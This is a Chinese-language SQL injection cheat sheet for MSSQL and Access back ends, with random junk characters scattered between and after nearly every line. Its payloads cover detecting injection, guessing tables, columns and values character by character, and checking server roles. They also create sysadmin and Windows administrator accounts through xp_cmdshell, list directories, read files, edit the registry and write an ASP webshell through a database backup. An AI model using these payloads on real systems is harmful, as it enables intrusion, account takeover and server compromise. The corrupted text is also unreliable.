1.判断是否有注入;and 1=1 ;and 1=2 'u��<e<hU�
2.初步判断是否是mssql ;and user>0 Be|! S_Y P
|�Ml~Pmpp
3.注入参数是字符'and [查询条件] and ''=' fv7VDo8vb
�Y_Gd_+o�J
4.搜索时没过滤参数的'and [查询条件] and '%25'=' .h��W��>#
�N�IQ}A-b�
5.判断数据库系统 �XKTDB�aON
{}$rN@O�M$
;and (select count(*) from sysobjects)>0 mssql "\@J0�|ppb
�V�e�(�<s
;and (select count(*) from msysobjects)>0 access dCoP
qK��y
9Rk�(q4.OP
>.qFhO\1so
iLnW5y�y��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 4<(�$Z�N8
^^v3�iCT�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �J�,Ki2'=�
5�0MM05aC�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @m�5J%8>k
WVeNO,?ytS
9.(1)猜字段的ascii值(access) �!kSem��DC
]�S%_&ZMCM
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �FXr�^ 4B}
^(T�CUY~f&
(2)猜字段的ascii值(mssql) J�920A^)j!
0�HWSdf|�w
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 K�F�'fg�
R
�d�7k�E}{,
10.测试权限结构(mssql) /�
<�(�|4e
~3�bV~H#~m
{Z/iYHv~#c
Xgx/ubc�a0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 1e[�?}q]*�
�|6Y:W$7k�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 8~(,qU8-�N
\r
IOnZ.WK
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �Hp�ix:�To
+1wEoU.l�2
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �0cG[<�\qT
+~V_^-JG&�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- (L�K@w9)i;
!U?C��_�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Y)k��"KRW+
�Ze%S<xT!O
;and 1=(select IS_MEMBER('db_owner'));-- K �ar��!��
p1'q�{E+o*
vT#R>0@m�i
q%G�[t��Xw
11.添加mssql和系统的帐户 B5 /8LEWw�
"1gIR^S%�9
;exec master.dbo.sp_addlogin username;-- �Y!j��/,FU
;exec master.dbo.sp_password null,username,password;-- ��^!B]V>L-
diNSF-wi,,
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- g��N}$$vS�
<�zqIq9}r�
;exec master.dbo.xp_cmdshell 'net user username password )�s>|;K�{�
"S#$:9�2�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��[,U��l��
K-]) R�IM�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �W�bl�H�}�
Q�yA^9@iVs
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �#T��c`W_-
M�c�c�%&j�
3DO*�kM1s@
J�?{sTj"KB
12.(1)遍历目录 B4u�n6-<i�
2�`Bb9&ut>
;create table dirs(paths varchar(100), id int) Q.$/I+��&j
P>q��~ocq<
;insert dirs exec master.dbo.xp_dirtree 'c:\' U>k�aQ�54/
(A2ga�):Pk
;and (select top 1 paths from dirs)>0 jk`�U7��G*
IsT}T}p,�t
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Uhvy�2�}w
:Jyr^0�`J�
Pm P&Qje�7
9=}#��.W3.
(2)遍历目录 )Jvo%Y���
��IgJG,!>h
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- |d&Kr0�QIV
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 c*#$sZ@�YA
JQ
�?8�yl
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 x(��>�XM:|
jA^y�Ud-��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 N#-�%b"��(
-�5e8�m4*�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 L2Cb/!z�`c
0��>m$e�(Z
�al��R�z@N
v���"��2A?
13.mssql中的存储过程 MX*4d�{�l
lr�e(]oBXA
xp_regenumvalues 注册表根键, 子键 k�K6t|Yn�&
�I�HW s<U�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 N\ <ri�S9
}qGd*k0F�0
xp_regread 根键,子键,键值名 w�y|b Hkr_
i*l�=xW;bM
;exec xp_regread xX%{��i�0E
I�RLA��sb3
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 "$��5cK�bJ
QX?moW6U�W
xp_regwrite 根键,子键, 值名, 值类型, 值 y���z3��=#
^V�zhj�KSu
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 7lYf+&J�Z�
�pbh>RS=ri
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �DQOb�HB8L
�= ��<A0;
xp_regdeletevalue 根键,子键,值名 �~Q^.7.-T
hH$��9GL{H
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >8>s
K(�S]
??Urm[Y�.Z
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 a��"}ndrc*
]/p>�p3@1C
EFU)0IAL[
�ENA�"T-p�
14.mssql的backup创建webshell j�7Zv"Vq@�
�h+_�:zWU
use model `}Zt�K57�4
18��~jUYMV
create table cmd(str image); 9h+T�O_T@F
�>�BJ�BM |
insert into cmd(str) values (''); wg
k�[_i�
�3�� q�8S�
backup database model to disk='c:\l.asp'; �~mHrgxQ-
0T�@axQ�[%
z2R�?GQ5 A
+�i /4G.=*
15.mssql内置函数 �����Bv�j
�U$�@}!��X
;and (select @@version)>0 获得Windows的版本号 4QC_��zyTE
1D�1kjM^Bo
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ?]*"S{Cq�v
l�t'N{LFvc
;and (select user_name())>0 爆当前系统的连接用户 )��C�\/��(
)`<&~��>qp
;and (select db_name())>0 得到当前连接的数据库 �`�p)�U6�J
� b�u�tB�S
-o�Zw+ge}�
T#e|{ZCb�q
16.简洁的webshell N3Q
.4?
z9
�Z>�/
�*q2
use model ����W3�('1
]T�40VGJ:h
create table cmd(str image); u!HbS*jqq�
Ke[`zui@�?
insert into cmd(str) values (''); h�0�x'QiCc
J�z0AYi�Cq
backup database model to disk='g:\wwwtest\l.asp';
